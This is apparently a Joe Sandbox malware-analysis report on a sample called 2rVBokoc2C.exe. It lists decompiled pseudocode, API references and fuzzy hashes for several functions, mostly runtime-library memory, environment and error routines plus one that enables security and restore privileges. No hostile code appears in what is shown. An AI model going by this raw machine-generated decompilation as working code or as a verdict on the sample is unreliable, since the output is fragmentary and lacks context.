Opcode Fuzzy Hash: 971bf1428a6d8b29bbba853e28cab2bfb69d99166ef52f1425d9a14f6c2e0124
Instruction Fuzzy Hash: 52417D72A402049FCB24DF78C891F6EB7E6EF89714F1545ADE515EB281EB31AD01CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00BCB510 Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00BCB510() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E00BCB4D9(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E00BC8398(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E00BC835E(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}

0x00bcb51f
0x00bcb525
0x00bcb57d
0x00bcb57d
0x00bcb527
0x00bcb528
0x00bcb52d
0x00bcb536
0x00bcb53c
0x00bcb542
0x00bcb547
0x00000000
0x00bcb549
0x00bcb54f
0x00bcb554
0x00bcb572
0x00bcb56c
0x00bcb56c
0x00bcb56e
0x00bcb56e
0x00bcb575
0x00bcb57a
0x00bcb547
0x00bcb581
0x00bcb584
0x00bcb584
0x00bcb592

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00BCB519
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00BCB53C

Part of subcall function 00BC8398: RtlAllocateHeap.NTDLL(00000000,?,?,?,00BC3866,?,0000015D,?,?,?,?,00BC4D42,000000FF,00000000,?,?), ref: 00BC83CA

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00BCB562
_free.LIBCMT ref: 00BCB575
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00BCB584

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 72ccbca91ec903f1fdc5fa4a9a3651db4fcf93fbda7cb2cf16734f8f52327542
Instruction ID: 0031ba648fe026faa06f707043270f86740cbd7fe7d09370df867d260ee391b8
Opcode Fuzzy Hash: 72ccbca91ec903f1fdc5fa4a9a3651db4fcf93fbda7cb2cf16734f8f52327542
Instruction Fuzzy Hash: E101D472B12250BF232117766CAAE7FBAEDDED6FA071501ADB904E3150EF628D0181B0

Uniqueness

Uniqueness Score: -1.00%

Function 00BC8EA9 Relevance: 7.6, APIs: 5, Instructions: 53
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E00BC8EA9(void* __ecx, void* __edx) {
				void* __esi;
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0xbdd6ac; // 0x6
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E00BC8429(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E00BCA4F1(_t13, _t17, __eflags,  *0xbdd6ac, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E00BC8C96(_t13, _t16, 0xc00288);
							E00BC835E(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E00BC835E();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E00BCA49B(_t11, _t17, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

0x00bc8ea9
0x00bc8eb4
0x00bc8eb6
0x00bc8eb8
0x00bc8ebd
0x00bc8ec0
0x00bc8ece
0x00bc8eda
0x00bc8edd
0x00bc8ee0
0x00bc8ef2
0x00bc8ef7
0x00bc8ef9
0x00bc8f04
0x00bc8f0a
0x00bc8f12
0x00bc8f14
0x00000000
0x00000000
0x00000000
0x00000000
0x00bc8efb
0x00bc8efb
0x00000000
0x00bc8efb
0x00bc8ee2
0x00bc8ee2
0x00bc8ee3
0x00bc8ee3
0x00bc8f16
0x00bc8f17
0x00bc8f17
0x00bc8ec2
0x00bc8ec8
0x00bc8ecc
0x00bc8f1f
0x00bc8f20
0x00bc8f26
0x00000000
0x00000000
0x00000000
0x00bc8ecc
0x00bc8f2d

APIs

GetLastError.KERNEL32(?,?,?,00BC87DF,00BC847B,?,00BC8E53,00000001,00000364,?,00BC36CF,?,?,00BDFF50), ref: 00BC8EAE
_free.LIBCMT ref: 00BC8EE3
_free.LIBCMT ref: 00BC8F0A
SetLastError.KERNEL32(00000000,?,00BDFF50), ref: 00BC8F17
SetLastError.KERNEL32(00000000,?,00BDFF50), ref: 00BC8F20

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 1ff1d6d73bcc05617a911dee2b12e508c406c3e0e34882686fff69536782fed3
Instruction ID: 1ff22472e3bbbc59046545cbd5d716020e1f1217fac1fd9dd6af51481864432c
Opcode Fuzzy Hash: 1ff1d6d73bcc05617a911dee2b12e508c406c3e0e34882686fff69536782fed3
Instruction Fuzzy Hash: FC01F43610A6026B93166734AD99F2B22DAEBD077173105ADF515A3282EE708C018164

Uniqueness

Uniqueness Score: -1.00%

Function 00BB06B9 Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00BB06B9(void* __ecx) {
				intOrPtr _v16;
				void* __ebp;
				int _t16;
				void** _t21;
				long* _t25;
				void* _t28;
				void* _t30;
				intOrPtr _t31;

				_t22 = __ecx;
				_push(0xffffffff);
				_push(E00BD1E4C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t31;
				_t28 = __ecx;
				E00BB09A1(__ecx);
				_t25 = 0;
				 *((char*)(__ecx + 0x314)) = 1;
				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
					_t21 = _t28 + 4;
					do {
						E00BB07AC(_t22, _t30,  *_t21);
						CloseHandle( *_t21);
						_t25 = _t25 + 1;
						_t21 =  &(_t21[1]);
					} while (_t25 <  *((intOrPtr*)(_t28 + 0x104)));
				}
				DeleteCriticalSection(_t28 + 0x320);
				CloseHandle( *(_t28 + 0x318));
				_t16 = CloseHandle( *(_t28 + 0x31c));
				 *[fs:0x0] = _v16;
				return _t16;
			}

0x00bb06b9
0x00bb06c2
0x00bb06c4
0x00bb06c9
0x00bb06ca
0x00bb06d4
0x00bb06d6
0x00bb06db
0x00bb06dd
0x00bb06ed
0x00bb06f9
0x00bb06fb
0x00bb06fe
0x00bb0700
0x00bb0707
0x00bb070d
0x00bb070e
0x00bb0711
0x00bb06fe
0x00bb0720
0x00bb072c
0x00bb0738
0x00bb0743
0x00bb074e

APIs

Part of subcall function 00BB09A1: ResetEvent.KERNEL32(?), ref: 00BB09B3
Part of subcall function 00BB09A1: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00BB09C7

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00BB06ED
CloseHandle.KERNEL32(?,?), ref: 00BB0707
DeleteCriticalSection.KERNEL32(?), ref: 00BB0720
CloseHandle.KERNEL32(?), ref: 00BB072C
CloseHandle.KERNEL32(?), ref: 00BB0738

Part of subcall function 00BB07AC: WaitForSingleObject.KERNEL32(?,000000FF,00BB08CB,?,?,00BB094F,?,?,?,?,?,00BB0939), ref: 00BB07B2
Part of subcall function 00BB07AC: GetLastError.KERNEL32(?,?,00BB094F,?,?,?,?,?,00BB0939), ref: 00BB07BE

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: 218fb48bdd671880a45c2023f96cb199adb628f643124efb073e0a0d68d1d698
Instruction ID: 3f873771d3da64fcb19ac7fef589d91536fe86caebfa79b04d695c54523d2987
Opcode Fuzzy Hash: 218fb48bdd671880a45c2023f96cb199adb628f643124efb073e0a0d68d1d698
Instruction Fuzzy Hash: 42018C72040744EBC722AF29DC84BD6FBE9FB48710F00056AF1AA93161DFB56944DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BCBDDF Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00BCBDDF(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0xbddd50; // 0xbddd44
					if(_t23 != 0) {
						E00BC835E(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0xbddd54; // 0xc006fc
					if(_t24 != 0) {
						E00BC835E(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0xbddd58; // 0xc006fc
					if(_t25 != 0) {
						E00BC835E(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0xbddd80; // 0xbddd48
					if(_t26 != 0) {
						E00BC835E(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0xbddd84; // 0xc00700
					if(_t27 != 0) {
						return E00BC835E(_t6);
					}
				}
				return _t6;
			}

0x00bcbde5
0x00bcbdea
0x00bcbdee
0x00bcbdf4
0x00bcbdf7
0x00bcbdfc
0x00bcbe00
0x00bcbe06
0x00bcbe09
0x00bcbe0e
0x00bcbe12
0x00bcbe18
0x00bcbe1b
0x00bcbe20
0x00bcbe24
0x00bcbe2a
0x00bcbe2d
0x00bcbe32
0x00bcbe33
0x00bcbe36
0x00bcbe3c
0x00000000
0x00bcbe44
0x00bcbe3c
0x00bcbe47

APIs

_free.LIBCMT ref: 00BCBDF7

Part of subcall function 00BC835E: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCBE76,?,00000000,?,00000000,?,00BCBE9D,?,00000007,?,?,00BCC29A,?), ref: 00BC8374
Part of subcall function 00BC835E: GetLastError.KERNEL32(?,?,00BCBE76,?,00000000,?,00000000,?,00BCBE9D,?,00000007,?,?,00BCC29A,?,?), ref: 00BC8386

_free.LIBCMT ref: 00BCBE09
_free.LIBCMT ref: 00BCBE1B
_free.LIBCMT ref: 00BCBE2D
_free.LIBCMT ref: 00BCBE3F

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 91f8aa36e37d85c1432672f2e2a0362d996221b94e9d9523962ed111b20e9843
Instruction ID: 88eb8ba4092d008495d6b99507574ac0572a07d059bad15a560659ceb0eff35f
Opcode Fuzzy Hash: 91f8aa36e37d85c1432672f2e2a0362d996221b94e9d9523962ed111b20e9843
Instruction Fuzzy Hash: 67F01233509241ABCA24DB58F986F5EB7DAFA44B20B681C9EF148D7550DF31FC80CA94

Uniqueness

Uniqueness Score: -1.00%

Function 00BC7E80 Relevance: 7.5, APIs: 5, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00BC7E80(signed int __ecx) {
				intOrPtr _t7;

				asm("lock xadd [eax], ecx");
				if((__ecx | 0xffffffff) == 0) {
					_t7 =  *0xbddd40; // 0x8621c8
					if(_t7 != 0xbddb20) {
						E00BC835E(_t7);
						 *0xbddd40 = 0xbddb20;
					}
				}
				E00BC835E( *0xc00280);
				 *0xc00280 = 0;
				E00BC835E( *0xc00284);
				 *0xc00284 = 0;
				E00BC835E( *0xc006d0);
				 *0xc006d0 = 0;
				E00BC835E( *0xc006d4);
				 *0xc006d4 = 0;
				return 1;
			}

0x00bc7e89
0x00bc7e8d
0x00bc7e8f
0x00bc7e9b
0x00bc7e9e
0x00bc7ea4
0x00bc7ea4
0x00bc7e9b
0x00bc7eb0
0x00bc7ebd
0x00bc7ec3
0x00bc7ece
0x00bc7ed4
0x00bc7edf
0x00bc7ee5
0x00bc7eed
0x00bc7ef6

APIs

_free.LIBCMT ref: 00BC7E9E

Part of subcall function 00BC835E: RtlFreeHeap.NTDLL(00000000,00000000,?,00BCBE76,?,00000000,?,00000000,?,00BCBE9D,?,00000007,?,?,00BCC29A,?), ref: 00BC8374
Part of subcall function 00BC835E: GetLastError.KERNEL32(?,?,00BCBE76,?,00000000,?,00000000,?,00BCBE9D,?,00000007,?,?,00BCC29A,?,?), ref: 00BC8386

_free.LIBCMT ref: 00BC7EB0
_free.LIBCMT ref: 00BC7EC3
_free.LIBCMT ref: 00BC7ED4
_free.LIBCMT ref: 00BC7EE5

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 26e8a6606fc46a33aa7b86619181e1ea4ae770cf9155e33be2584ff58c8d0e03
Instruction ID: 39ed367b628ef08b948474f1ece7b197f674ee56946b0b4fa696d5fe4efc7633
Opcode Fuzzy Hash: 26e8a6606fc46a33aa7b86619181e1ea4ae770cf9155e33be2584ff58c8d0e03
Instruction Fuzzy Hash: A1F05E7684A2228BCB416F14FD06B1C3BE6F794B20F27159BF440672B0DF320812DB84

Uniqueness

Uniqueness Score: -1.00%

Function 00BC74E3 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00BC74E3(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E00BCB110(_t52);
					GetModuleFileNameA(0, 0xc00128, 0x104);
					_t49 =  *0xc006d8; // 0x853338
					 *0xc006e0 = 0xc00128;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0xc00128;
					}
					_v8 = 0;
					_v16 = 0;
					E00BC7607(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E00BC777C(_v8, _v16, 1);
					if(_t64 != 0) {
						E00BC7607(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E00BCAC23(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0xc006cc = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0xc006d0 = _t59;
									L16:
									E00BC835E(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0xc006cc = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0xc006d0 = _t43;
						goto L10;
					} else {
						_t44 = E00BC87DA();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E00BC835E(_t64);
						return _t50;
					}
				} else {
					_t45 = E00BC87DA();
					_t65 = 0x16;
					 *_t45 = _t65;
					E00BC86B9();
					return _t65;
				}
			}

0x00bc74e3
0x00bc74f0
0x00bc7510
0x00bc7523
0x00bc7529
0x00bc752f
0x00bc7537
0x00bc753e
0x00bc753e
0x00bc7543
0x00bc754a
0x00bc7551
0x00bc7563
0x00bc756a
0x00bc7589
0x00bc7595
0x00bc75b0
0x00bc75b3
0x00bc75ba
0x00bc75c0
0x00bc75c7
0x00bc75ca
0x00bc75cc
0x00bc75d0
0x00bc75da
0x00bc75da
0x00bc75dc
0x00bc75e2
0x00bc75e5
0x00bc75e7
0x00bc75ed
0x00bc75ee
0x00bc75f4
0x00000000
0x00000000
0x00000000
0x00000000
0x00bc75d2
0x00bc75d2
0x00bc75d2
0x00bc75d5
0x00bc75d6
0x00000000
0x00bc75d2
0x00bc75c2
0x00000000
0x00bc75c2
0x00bc759b
0x00bc75a0
0x00bc75a2
0x00bc75a4
0x00000000
0x00bc756c
0x00bc756c
0x00bc7571
0x00bc7573
0x00bc7574
0x00bc75a9
0x00bc75a9
0x00bc75f7
0x00bc75f8
0x00000000
0x00bc7601
0x00bc74f8
0x00bc74f8
0x00bc74ff
0x00bc7500
0x00bc7502
0x00000000
0x00bc7507

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\2rVBokoc2C.exe,00000104), ref: 00BC7523
_free.LIBCMT ref: 00BC75EE
_free.LIBCMT ref: 00BC75F8

Strings

C:\Users\user\Desktop\2rVBokoc2C.exe, xrefs: 00BC751A, 00BC7521, 00BC7550, 00BC7588

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\2rVBokoc2C.exe
API String ID: 2506810119-3211538610
Opcode ID: fd75bc2d2177e652c3af41ba2dc4d2d9d561232a4fee0688fc60cfd9354acc58
Instruction ID: d8ac3e530e159d7d84d96dc2296c3bfd03b36cdc0bd8893247386959b40837b4
Opcode Fuzzy Hash: fd75bc2d2177e652c3af41ba2dc4d2d9d561232a4fee0688fc60cfd9354acc58
Instruction Fuzzy Hash: DF315271A48218AFDB11DB999885FAEBBFCEB94710F2140ABF80497211DA718E40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00BA754D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00BA754D(void* __ebx, void* __edx, void* __esi) {
				void* _t26;
				long _t32;
				void* _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t52;
				void* _t57;
				void* _t58;
				void* _t61;

				_t57 = __esi;
				_t52 = __edx;
				_t42 = __ebx;
				E00BBE0E4(E00BD1D77, _t61);
				E00BBE1C0();
				 *((intOrPtr*)(_t61 - 0x20)) = 0;
				 *((intOrPtr*)(_t61 - 0x1c)) = 0;
				 *((intOrPtr*)(_t61 - 0x18)) = 0;
				 *((intOrPtr*)(_t61 - 0x14)) = 0;
				 *((char*)(_t61 - 0x10)) = 0;
				_t54 =  *((intOrPtr*)(_t61 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t61 - 4)) = 0;
				_push(_t61 - 0x20);
				if(E00BA3B26( *((intOrPtr*)(_t61 + 8)), _t52) != 0) {
					if( *0xbdfeb2 == 0) {
						if(E00BA7BCE(L"SeSecurityPrivilege") != 0) {
							 *0xbdfeb1 = 1;
						}
						E00BA7BCE(L"SeRestorePrivilege");
						 *0xbdfeb2 = 1;
					}
					_push(_t57);
					_t58 = 7;
					if( *0xbdfeb1 != 0) {
						_t58 = 0xf;
					}
					_push(_t42);
					_t43 =  *((intOrPtr*)(_t61 - 0x20));
					_push(_t43);
					_push(_t58);
					_push( *((intOrPtr*)(_t61 + 0xc)));
					if( *0xc01000() == 0) {
						if(E00BAB5AC( *((intOrPtr*)(_t61 + 0xc)), _t61 - 0x106c, 0x800) == 0) {
							L10:
							E00BA7032(_t70, 0x52, _t54 + 0x1e,  *((intOrPtr*)(_t61 + 0xc)));
							_t32 = GetLastError();
							E00BC2DC0(_t32);
							if(_t32 == 5 && E00BAFF7D() == 0) {
								E00BA159C(_t61 - 0x6c, 0x18);
								E00BB0D97(_t61 - 0x6c);
							}
							E00BA6F5B(0xbdff50, 1);
						} else {
							_t39 =  *0xc01000(_t61 - 0x106c, _t58, _t43);
							_t70 = _t39;
							if(_t39 == 0) {
								goto L10;
							}
						}
					}
				}
				_t26 = E00BA15D1(_t61 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t26;
			}

0x00ba754d
0x00ba754d
0x00ba754d
0x00ba7552
0x00ba755c
0x00ba7564
0x00ba7567
0x00ba756a
0x00ba756d
0x00ba7570
0x00ba7573
0x00ba7578
0x00ba7579
0x00ba757a
0x00ba7580
0x00ba7588
0x00ba7595
0x00ba75a3
0x00ba75a5
0x00ba75a5
0x00ba75b1
0x00ba75b6
0x00ba75b6
0x00ba75c4
0x00ba75c7
0x00ba75c8
0x00ba75cc
0x00ba75cc
0x00ba75cd
0x00ba75ce
0x00ba75d1
0x00ba75d2
0x00ba75d3
0x00ba75de
0x00ba75f6
0x00ba760b
0x00ba7614
0x00ba7619
0x00ba7628
0x00ba7630
0x00ba7640
0x00ba7648
0x00ba7648
0x00ba7651
0x00ba75f8
0x00ba7601
0x00ba7607
0x00ba7609
0x00000000
0x00000000
0x00ba7609
0x00ba75f6
0x00ba7657
0x00ba765b
0x00ba7664
0x00ba766e

APIs

__EH_prolog.LIBCMT ref: 00BA7552

Part of subcall function 00BA3B26: __EH_prolog.LIBCMT ref: 00BA3B2B

GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00BA7619

Part of subcall function 00BA7BCE: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BA7BDD
Part of subcall function 00BA7BCE: GetLastError.KERNEL32 ref: 00BA7C23
Part of subcall function 00BA7BCE: CloseHandle.KERNEL32(?), ref: 00BA7C32

Strings

SeRestorePrivilege, xrefs: 00BA75AC
SeSecurityPrivilege, xrefs: 00BA7597

Memory Dump Source

Source File: 00000000.00000002.438183335.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true

Associated: 00000000.00000002.438179507.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438305520.0000000000BD2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438317024.0000000000BDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438342561.0000000000BE3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438351002.0000000000C00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438356952.0000000000C01000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438370351.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.438380720.0000000000C21000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ba0000_2rVBokoc2C.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 1bcb7aa72496595bf7462f6ad45cb3f935f5c1d06ace004b8351bc1411694a66
Instruction ID: 2e533ece4bd6e0ae894753353da5f87670faabf9027c91cbdd4563014c4fd262
